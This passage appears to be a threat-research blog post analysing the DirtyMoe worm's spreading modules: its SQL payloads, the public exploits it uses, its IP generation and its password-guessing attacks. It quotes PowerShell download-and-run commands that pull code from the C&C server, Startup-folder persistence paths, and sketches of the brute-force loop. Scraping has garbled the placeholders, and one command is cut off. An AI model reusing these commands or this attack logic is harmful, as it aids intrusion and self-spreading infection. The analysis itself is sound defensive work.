    The module creates an OLE object using the VBScript "WScript.Shell" and runs Payload 3.
  4. xp_cmdshell
    This method spawns a Windows command shell and passes in a string for execution represented by Payload 3.
  5. Run-time Environment
    Payload 4 is executed as a .NET assembly.

In brief, there are four payloads used for the DirtyMoe installation. The SQL worming module defines a placeholder @[email protected] representing a full URL to the MSI installation package located on the C&C server. If any of the payloads successfully performs a privilege escalation, the DirtyMoe installation is silently launched via the MSI installer; see our DirtyMoe Deployment blog post for more details.

Payload 1

The first payload tries to run the following PowerShell command:
powershell -nop -exec bypass -c "IEX $decoded; MsiMake @[email protected];"
where $decoded contains the MsiMake function, as illustrated in Figure 8. The function calls the MsiInstallProduct function from msi.dll to perform a completely silent installation (INSTALLUILEVEL_NONE), but only if the MS SQL server runs under administrator privileges.

Figure 8. MsiMake function
Payload 2

The second payload is used only for sp_makewebtask execution; the payload is written to the following autostart folders:
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.hta
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\1.hta

Figure 9 illustrates the content of the 1.hta file camouflaged as an HTML file. It is evident that DirtyMoe may be installed on each Windows startup.

Figure 9. ActiveX object runs via sp_makewebtask
Payload 3

The last payload is more sophisticated since it targets the vulnerabilities and exploits mentioned above. Firstly, the worming module prepares a @[email protected] placeholder containing a full URL to the DirtyMoe object that is the adapted version of the Tater PowerShell script.

The first stage of the payload is a PowerShell command:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(''@[email protected]''); MsiMake @[email protected]"

The adapted Tater script implements the extended MsiMake function. The script attempts to install DirtyMoe in three different ways:

  1. Install DirtyMoe via the MsiMake implementation captured in Figure 8.
  2. Attempt to exploit the system using Invoke-ReflectivePEInjection with the following arguments:
    Invoke-ReflectivePEInjection -PEBytes $Bytes -ExeArgs [email protected]@ -ForceASLR
    where $Bytes is the implementation of CVE-2019-1458 that is included in the script.
  3. The last way is installation via the Tater command:
    Invoke-Tater -Command [email protected]@

The example of Payload 3 is:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(
''); MsiMake

Payload 4

The attackers use .NET to provide a run-time environment that executes an arbitrary command in the MS SQL environment. The worming module defines a new .NET assembly procedure using the Common Language Runtime (CLR), as Figure 10 demonstrates.

Figure 10. Payload 4 is defined as a .NET assembly

The .NET code of Payload 4 is a simple class defining a SQL procedure ExecCommand that runs a malicious command using the Process class, as shown in Figure 11.

Figure 11. .NET code executing malicious commands
5.5 Development Module

We have discovered one worming module containing artifacts that indicate that the module is in development. This module does not appear to be widespread in the wild, and it may give insight into the malware authors’ future intentions. The module contains many hard-coded sections in different states of development; some sections do not hint at the @[email protected] execution.


CVE-2019-9082: ThinkPHP - Multiple PHP Injection RCEs.

The module uses the exact implementation published at [7]; see Figure 12. In short, a CGI script that verifies the availability of call_user_func_array is sent. If the verification passes, the CGI script is re-sent with @[email protected].

Figure 12. CVE-2019-9082: ThinkPHP

CVE-2018-0147: Deserialization Vulnerability

The current module implementation executes a malicious Java class [8], shown in Figure 13, on an attacked server. The RunCheckConfig class is an executioner for accepted connections that include a malicious serializable object.

Figure 13. Java class RunCheckConfig executing arbitrary commands

The module prepares the serializable object illustrated in Figure 14 that the RunCheckConfig class runs when the server accepts this object through the HTTP POST method.

Figure 14. Deserialized object including @[email protected]

The implementation that delivers the RunCheckConfig class to the attacked server abuses the same vulnerability. It prepares a serializable object executing ObjectOutputStream, which writes the RunCheckConfig class to c:/windows/tmp. However, this implementation is not included in this module, so we assume that this module is still in development.

Oracle Weblogic Server

CVE-2019-2725: Oracle Weblogic Server - 'AsyncResponseService' Deserialization RCE

The module again exploits vulnerabilities published at [9] to send malicious SOAP payloads without any authentication to the Oracle Weblogic Server T3 interface, followed by sending additional SOAP payloads to the WLS AsyncResponseService interface.

The SOAP request defines the WorkContext as java.lang.Runtime with three arguments. The first argument defines which executable should be run. The following arguments determine parameters for the executable. An example of the WorkContext is shown in Figure 15.

Figure 15. SOAP request for Oracle Weblogic Server

Hardcoded SOAP commands are not related to @[email protected]; we assume that this implementation is also in development.

6. Worming Module Execution

The worming module is managed by the DirtyMoe service, which controls its configuration, initialization, and worming execution. This section describes the lifecycle of the worming module.

6.1 Configuration

The DirtyMoe service contacts one of the C&C servers and downloads an appropriate worming module into a Shim Database (SDB) file located at %windir%\apppatch\TK<volume-id>MS.sdb. The worming module is then decrypted and injected into a new svchost.exe process, as Figure 2 illustrates.

The encrypted module is a PE executable that contains additional placeholders. The DirtyMoe service passes configuration parameters to the module via these placeholders. This approach is identical to other DirtyMoe modules; however, some of the placeholders are not used in the case of the worming module.

The placeholders overview is as follows:

6.2 Initialization

When the worming module, represented by the new process, is injected and resumed by the DirtyMoe service, the module initialization is invoked. Firstly, the module unpacks a word dictionary containing passwords for a dictionary attack. The dictionary consists of 100,000 commonly used passwords compressed using LZMA. Secondly, internal structures are established as follows:

IP Address Backlog
The module stores discovered IP addresses with open ports of interest. It saves the IP address and the timestamp of the last port check.

Dayspan and Hourspan Lists
These lists manage IP addresses and their insertion timestamps used for the dictionary attack. The IP addresses are picked up based on a threshold value defined in the configuration. The IP will be processed if the IP address timestamp surpasses the threshold value of the day or hour span. If, for example, the threshold is set to 1, then if a day/hour span of the current date and a timestamp is greater than 1, a corresponding IP will be processed. The Dayspan list registers IPs generated by Class B from IP Table, Fully Random IP, and Derived Classes A methods; in other words, IPs that are further away from the worming module location. On the other hand, the Hourspan list records IPs located closer.
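The day/hour-span threshold comparison described above can be sketched as follows (function and parameter names are ours):

```python
def should_process(inserted_at, now, threshold, span):
    """Return True when an IP's age exceeds the configured HX threshold.
    `span` selects the list semantics: 'day' for the Dayspan list,
    'hour' for the Hourspan list. Timestamps are datetime objects."""
    age = now - inserted_at
    elapsed = age.days if span == "day" else int(age.total_seconds() // 3600)
    return elapsed > threshold
```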

Thirdly, the module reads its configuration described by the @[email protected] placeholder. The configuration matches this pattern: <IP>|<PNG_ID>|<timeout>|[SMB:HX:PX1.X2.X3:AX:RX:BX:CX:DX:NX:SMB]

  • IP is the number representing the machine IP from which the attack will be carried out. The IP is input for the methods generating IPs; see Section 4. If the IP is not available, the default address is used.
  • PNG_ID is the number used to derive the hash name that mirrors the DirtyMoe object name (MSI installer package) stored on the C&C. The hash name is generated using the MS_RPC_<n> string, where n is PNG_ID; see Section 3.
  • Timeout is the default timeout for connections to the attacked services in seconds.
  • HX is a threshold for comparing IP timestamps stored in the Dayspan and Hourspan lists. The comparison ascertains whether an IP address will be processed if the timestamp of the IP address exceeds the day/hour threshold.
  • P is the flag for the dictionary attack.
    • X1 number determines how many initial passwords will be used from the password dictionary to increase the probability of success – the dictionary contains the most used passwords at the beginning.
    • X2 number is used for the second stage of the dictionary attack if the first X1 passwords are unsuccessful. Then the worming module tries to select X2 passwords from the dictionary randomly.
    • X3 number defines how many threads will process the Dayspan and Hourspan lists; more precisely, how many threads will attack the registered IP addresses in the Dayspan/Hourspan lists.
  • AX: how many threads will generate IP addresses using Class B from IP Table methods.
  • RX: how many threads for the Fully Random IP method.
  • BX, CX, DX: how many threads for the Derived Classes A, B, C methods.
  • NX defines a thread quantity for the Derived Local IPs method.

A typical configuration can look like: |5|2|[SMB:H1:P1.30.3:A10:R3:B3:C3:D1:N3:SMB]
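A parser for this configuration pattern can be sketched as follows, based solely on the layout described above (the real module’s parsing routine is not public, and all names here are ours):

```python
def parse_worm_config(cfg):
    """Parse <IP>|<PNG_ID>|<timeout>|[SMB:HX:PX1.X2.X3:AX:RX:BX:CX:DX:NX:SMB]
    into a dictionary of thread counts and attack parameters."""
    ip, png_id, timeout, rest = cfg.split("|", 3)
    tokens = rest.strip("[]").split(":")      # SMB, H1, P1.30.3, A10, ...
    params = {}
    for token in tokens[1:-1]:                # skip the SMB markers
        key, value = token[0], token[1:]
        params[key] = value
    x1, x2, x3 = params["P"].split(".")
    return {
        "ip": ip, "png_id": int(png_id), "timeout": int(timeout),
        "H": int(params["H"]),
        "P": (int(x1), int(x2), int(x3)),
        **{k: int(params[k]) for k in "ARBCDN"},
    }
```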

Finally, the worming module starts all threads defined by the configuration, and the worming process and attacks are started.

6.3 Worming

The worming process has five phases that run, more or less, in parallel. Figure 16 shows an animation of the worming process.

Figure 16. Worming module workflow
Phase 1

The worming module usually starts 23 threads generating IP addresses based on Section 4. The IP addresses are classified into two groups: day-span and hour-span.

Phase 2

The second phase runs in parallel with the first; its goal is to test the generated IPs. Each specific module targets defined ports, which are verified by sending a zero-length transport datagram. If the port is active and ready to receive data, the IP address of the active port is added to the IP Address Backlog. Additionally, the SMB worming module immediately attempts the EternalBlue attack within the port scan.
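The liveness test in this phase can be sketched as follows (a simplified TCP illustration with our own function name; the module’s actual probe logic is more involved):

```python
import socket

def port_is_live(ip, port, timeout=2.0):
    """Connect to the target port and send a zero-length payload; a
    successful connection marks the host for the IP Address Backlog."""
    try:
        with socket.create_connection((ip, port), timeout=timeout) as s:
            s.send(b"")  # zero-length probe
            return True
    except OSError:
        return False
```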

Phase 3

The IP addresses verified in Phase 2 are also registered into the Dayspan and Hourspan lists. The module keeps only 100 items (IP addresses), and the lists are implemented as a queue. Therefore, some IPs can be removed from these lists if the IP address generation is too fast or the dictionary attacks are too slow. However, the removed addresses are still present in the IP Address Backlog.
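The interplay of the bounded lists and the backlog can be modeled as a minimal sketch (class and method names are ours):

```python
from collections import deque

class TargetLists:
    """Dayspan/Hourspan lists hold at most 100 IPs each (oldest entries
    are dropped when full), while the IP Address Backlog keeps every
    verified address."""
    def __init__(self):
        self.backlog = {}                  # ip -> timestamp, never trimmed
        self.dayspan = deque(maxlen=100)   # distant targets
        self.hourspan = deque(maxlen=100)  # nearby targets

    def register(self, ip, timestamp, near=False):
        self.backlog[ip] = timestamp
        (self.hourspan if near else self.dayspan).append((ip, timestamp))
```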

Phase 4

The threads created based on the X3 configuration parameters process and manage the items (IPs) of Dayspan and Hourspan lists. Each thread picks up an item from the corresponding list, and if the defined day/hour threshold (HX parameter) is exceeded, the module starts the dictionary attack to the picked-up IP address.

Phase 5

Each generated and verified IP is associated with a timestamp of creation. The last phase is activated if the previous timestamp is older than 10 minutes, i.e., if the IP generation is suspended for any reason and no new IPs arrive within 10 minutes. One dedicated thread then extracts IPs from the backlog and processes them from the beginning, as per Phase 2, and the whole worming process continues.

6.4 Dictionary Attack

The dictionary attack targets two administrator user names, namely administrator for SMB services and sa for MS SQL servers. If the attack is successful, the worming module infiltrates a targeted system utilizing an attack series composed of techniques described in Section 5:

  • Service Control Manager Remote Protocol (SCMR)
  • Windows Management Instrumentation (WMI)
  • Microsoft SQL Server (SQL)

The first attack attempt is sent with an empty password. The module then addresses three states based on the attack response as follows:

  • No connection: the connection was not established, although a targeted port is open – a targeted service is not available on this port.
  • Unsuccessful: the targeted service/system is available, but authentication failed due to an incorrect username or password.
  • Success: the targeted service/system uses the empty password.
Administrator account has an empty password 

If the administrator account is not protected, the whole worming process occurs quickly (this is the best possible outcome from the attacker’s point of view). The worming module then proceeds to infiltrate the targeted system with the attack series (SCMR, WMI, SQL) by sending the empty password.

Bad username or authentication information

A more complex situation occurs if the targeted services are active, and it is necessary to attack the system by applying the password dictionary.

Cleverly, the module stores all previously successful passwords in the system registry; the first phase of the dictionary attack iterates through all stored passwords and uses these to attack the targeted system. Then, the attack series (SCMR, WMI, SQL) is started if the password is successfully guessed.

The second phase occurs if the stored registry passwords yield no success. The module then attempts authentication using a defined number of initial passwords from the password dictionary; this number is derived from the X1 configuration parameter (usually X1*100). If this phase is successful, the guessed password is stored in the system registry, and the attack series is initiated.

The final phase follows if the second phase is not successful. The module randomly chooses a password from a dictionary subset X2*100 times. The subset is defined as the original dictionary minus the first X1*100 items. In case of success, the attack series is invoked, and the password is added to the system registry.
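
Putting the three phases together, a hedged reconstruction of the guessing loop could look like this (`try_password` stands in for the real SCMR/WMI/SQL authentication attempt; X1/X2 follow the article's parameter names, the rest is ours):

```python
import random

def dictionary_attack(try_password, registry_pwds, dictionary, x1, x2):
    """Three-phase guessing as described above; returns the working
    password or None. Illustrative sketch, not recovered code."""
    # Phase 1: replay passwords that worked on earlier victims.
    for pwd in registry_pwds:
        if try_password(pwd):
            return pwd
    # Phase 2: the first X1*100 dictionary entries, in order.
    for pwd in dictionary[:x1 * 100]:
        if try_password(pwd):
            return pwd
    # Phase 3: X2*100 random picks from the rest of the dictionary.
    tail = dictionary[x1 * 100:]
    if tail:
        for _ in range(x2 * 100):
            pwd = random.choice(tail)
            if try_password(pwd):
                return pwd
    return None
```

On success, the caller would store the guessed password in the registry and launch the SCMR/WMI/SQL attack series.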

Successfully used passwords are stored, encrypted, in the system registry.

7. Summary and Discussion


We have detected three versions of the DirtyMoe worming module in use. Two versions specifically focus on the SMB service and MS SQL servers. However, the third contains several artifacts implying other attack vectors targeting PHP, Java Deserialization, and Oracle Weblogic Server. We continue to monitor and track these activities.

Attacked Machines

One interesting finding is an attack adaptation based on the geographical location of the worming module. The methods described in Section 4 try to distribute the generated IP addresses evenly, to cover the largest possible radius. Half of the threads generating victim IPs derive them from the module's own IP address; if that address is unavailable for some reason, an IP address located in Los Angeles is used as the base address.
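
A simplified sketch of the base-address selection follows (the real Los Angeles fallback IP is hard-coded in the module and not reproduced here, so the test uses a documentation address as a placeholder; `nearby_ip` is our guess at what deriving targets from the module's own IP might mean):

```python
import ipaddress
import random

def pick_base_ip(own_public_ip, la_fallback_ip):
    """Use the module's own public IP as the generation base;
    fall back to the hard-coded Los Angeles address otherwise."""
    return own_public_ip if own_public_ip else la_fallback_ip

def nearby_ip(base):
    """Hypothetical 'nearby' generation: keep the top 16 bits of the
    base address and randomize the rest."""
    b = int(ipaddress.IPv4Address(base))
    return str(ipaddress.IPv4Address((b & 0xFFFF0000) | random.getrandbits(16)))
```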

We performed a few VPN experiments for the following locations: the United States, Russian Federation, Czech Republic, and Taiwan. The results are animated in Figure 17; Table 1 records the attack distributions for each tested VPN.

VPN                | Attack Distribution                            | Top countries
United States      | North America (59%), Europe (21%), Asia (16%)  | United States
Russian Federation | North America (41%), Europe (33%), Asia (20%)  | United States, Iran, United Kingdom, France, Russian Federation
Czech Republic     | Europe (56%), Asia (14%), South America (11%)  | China, Brazil, Egypt, United States, Germany
Taiwan             | North America (47%), Europe (22%), Asia (18%)  | United States, United Kingdom, Japan, Brazil, Turkey

Table 1. VPN attack distributions and top countries
Figure 17. VPN attack distributions

Perhaps the most striking discovery was the observed lateral movement in local networks. The module keeps all successfully guessed passwords in the system registry; these saved passwords increase the probability of successful guessing inside local networks, particularly home and small-business networks. Therefore, if machines in a local network share the same weak, easily guessed passwords, the module can quickly infiltrate that network.


All abused exploits are from publicly available resources. We have identified six main vulnerabilities summarized in Table 2. The worming module adopts the exact implementation of EternalBlue, ThinkPHP, and Oracle Weblogic Server exploits from exploit-db. In the same way, the module applies and modifies implementations of DoublePulsar, Tater, and PowerSploit frameworks.

ID            | Description
CVE-2019-9082 | ThinkPHP – Multiple PHP Injection RCEs
CVE-2019-2725 | Oracle Weblogic Server – ‘AsyncResponseService’ Deserialization RCE
CVE-2019-1458 | WizardOpium Local Privilege Escalation
CVE-2018-0147 | Deserialization Vulnerability
CVE-2017-0144 | EternalBlue SMB Remote Code Execution (MS17-010)
MS15-076      | RCE Allowing Elevation of Privilege (Hot Potato Windows Privilege Escalation)
Table 2. Used exploits

C&C Servers

The C&C servers determine which module will be deployed on a victim machine. The mechanism of the worming module selection depends on client information additionally sent to the C&C servers. However, details of how this module selection works remain to be discovered.

Password Dictionary

The password dictionary is a collection of the most commonly used passwords obtained from the internet. The dictionary size is 100,000 words and numbers across several topics and languages. There are several language mutations for the top world languages, e.g., English, Spanish, Portuguese, German, French, etc. (passwort, heslo, haslo, lozinka, parool, wachtwoord, jelszo, contrasena, motdepasse). Other topics are cars (volkswagen, fiat, hyundai, bugatti, ford) and art (davinci, vermeer, munch, michelangelo, vangogh). The dictionary also includes dirty words and some curious names of historical personalities like hitler, stalin, lenin, hussein, churchill, putin, etc.

The dictionary is used for the SCMR, WMI, and SQL attacks. However, the SQL module hard-codes another 15 username/password pairs, also collected from the internet; these are usually the default passwords of well-known systems.

Worming Workflow

The modules also implement a technique for repeated attacks on machines with ‘live’ targeted ports, even when the first attack was unsuccessful. The attacks can be scheduled hourly or daily based on the worm configuration. This approach can prevent a firewall from blocking an attacking machine and reduce the risk of detection.

Another essential attribute is the closing of TCP port 445 following a successful exploit of a targeted system. This way, compromised machines are “protected” from other malware that abuses the same vulnerabilities. The MSI installer also includes a mechanism that prevents DirtyMoe from overwriting itself, so that the configuration and already downloaded modules are preserved.
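
One plausible way for software to “close” TCP port 445 on Windows is a host-firewall rule; the sketch below builds such a `netsh advfirewall` command (the rule name is ours, and the module's actual mechanism is not documented in this article):

```python
import subprocess

# Standard Windows Firewall CLI invocation; only the rule name is invented.
FIREWALL_RULE = ["netsh", "advfirewall", "firewall", "add", "rule",
                 "name=Block445", "dir=in", "action=block",
                 "protocol=TCP", "localport=445"]

def block_smb_port(dry_run=True):
    """Block inbound TCP 445 (illustrative sketch). With dry_run=True,
    just return the command line that would be executed."""
    if dry_run:
        return " ".join(FIREWALL_RULE)
    subprocess.run(FIREWALL_RULE, check=True)
```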

IP Generation Performance

The primary key to this worm’s success is the performance of the IP generator. We have used empirical measurement to determine the performance of the worming module. This measurement indicates that one module instance can generate and attack 1,500 IPs per second on average. However, one of the tested instances could generate up to 6,000 IPs/sec, so one instance can try two million IPs per day.

The evidence suggests that approximately 1,900 instances could generate the whole IPv4 range in one day; our detections estimate that more than 7,000 active instances exist in the wild. In theory, DirtyMoe can therefore generate and potentially attack the entire IPv4 range three times a day.
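
These figures can be sanity-checked with simple arithmetic (the result, ~2,100 instances, sits slightly above the article's ~1,900 estimate, which presumably assumes a somewhat higher per-instance rate):

```python
# Back-of-the-envelope check of the worming throughput figures.
IPV4_SPACE = 2 ** 32                   # ~4.29 billion addresses
IPS_PER_INSTANCE_PER_DAY = 2_000_000   # per-instance rate cited above

# Instances needed to sweep the whole IPv4 range in one day (~2,100):
instances_for_full_sweep = IPV4_SPACE / IPS_PER_INSTANCE_PER_DAY

# With ~7,000 active instances, full-range sweeps per day (~3.3):
sweeps_per_day = 7_000 * IPS_PER_INSTANCE_PER_DAY / IPV4_SPACE
```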

8. Conclusion

The primary goal of this research was to analyze one of the DirtyMoe module groups, which provides the spreading of the DirtyMoe malware using worming techniques. The second aim of this study was to examine the effects of worming and to determine which exploits are in use.

In most cases, DirtyMoe is deployed using external exploit kits like PurpleFox or injected Telegram Messenger installers, both of which require user interaction for successful infiltration. Importantly, worming is controlled by the C&C and executed by active DirtyMoe instances, so no user interaction is required.

Worming target IPs are generated using a cleverly designed algorithm that evenly generates IP addresses across the world, in relation to the geographical location of the worming module. Moreover, the module targets local/home networks. Because of this, public IPs and even private networks behind firewalls are at risk.

Victims’ active machines are attacked using EternalBlue exploits and dictionary attacks aimed at SCMR, WMI, and MS SQL services with weak passwords. Additionally, we have detected a total of six vulnerabilities abused by the worming module that implement publicly disclosed exploits.

We also discovered one worming module in development containing other vulnerability exploit implementations – it did not appear to be fully armed for deployment. However, there is a chance that tested exploits are already implemented and are spreading in the wild. 

Based on the amount of active DirtyMoe instances, it can be argued that worming can threaten hundreds of thousands of computers per day. Furthermore, new vulnerabilities, such as Log4j, provide a tremendous and powerful opportunity to implement a new worming module. With this in mind, our researchers continue to monitor the worming activities and hunt for other worming modules.


CVE-2019-1458: “WizardOpium” Local Privilege Escalation

SMB worming modules

SQL worming modules

Worming modules in development



The post DirtyMoe: Worming Modules appeared first on Avast Threat Labs.